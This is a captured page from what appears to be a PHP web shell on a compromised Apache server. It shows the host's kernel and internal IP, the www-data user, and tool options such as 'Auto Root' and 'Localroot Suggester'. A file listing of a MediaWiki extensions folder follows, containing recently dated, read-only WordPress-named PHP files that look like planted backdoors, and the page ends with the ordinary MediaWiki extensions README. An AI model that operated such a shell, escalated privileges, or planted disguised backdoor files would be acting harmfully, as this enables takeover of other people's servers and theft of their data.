Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
backup /
extensions /
Delete
Unzip
Name
Size
Permission
Date
Action
ConfirmEdit
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
Gadgets
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
Nuke
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
ParserFunctions
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
Renameuser
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
Vector
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
WikiEditor
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
.htaccess
197
B
-r--r--r--
2026-08-22 08:29
README
1.02
KB
-rw-r--r--
2010-10-30 13:43
wp-blog-header.php
2.74
KB
-r--r--r--
2026-08-22 08:29
wp-cron.php
2.74
KB
-rw-r--r--
2026-08-22 08:29
Save
Rename
Extensions (such as the hieroglyphic module WikiHiero) are distributed separately. Drop them into this extensions directory and enable as per the extension's directions. If you are a developer, you want to fetch the extension tree in another directory and make a symbolic link: mediawiki/extensions$ ln -s ../../extensions-trunk/FooBarExt The extensions are available through svn at: http://svn.wikimedia.org/svnroot/mediawiki/trunk/extensions/ You can find documentation and additional extensions on MediaWiki website: http://www.mediawiki.org/wiki/Category:Extensions Please note that under POSIX systems (Linux...), parent of a symbolic path refers to the link source, NOT to the target! You should check the env variable MW_INSTALL_PATH in case the extension is not in the default location. The following code snippet let you override the default path: $IP = getenv( 'MW_INSTALL_PATH' ); if( $IP === false ) { $IP = dirname( __FILE__ ) . '/../..'; } require( "$IP/maintenance/Maintenance.php" ); // a MediaWiki core file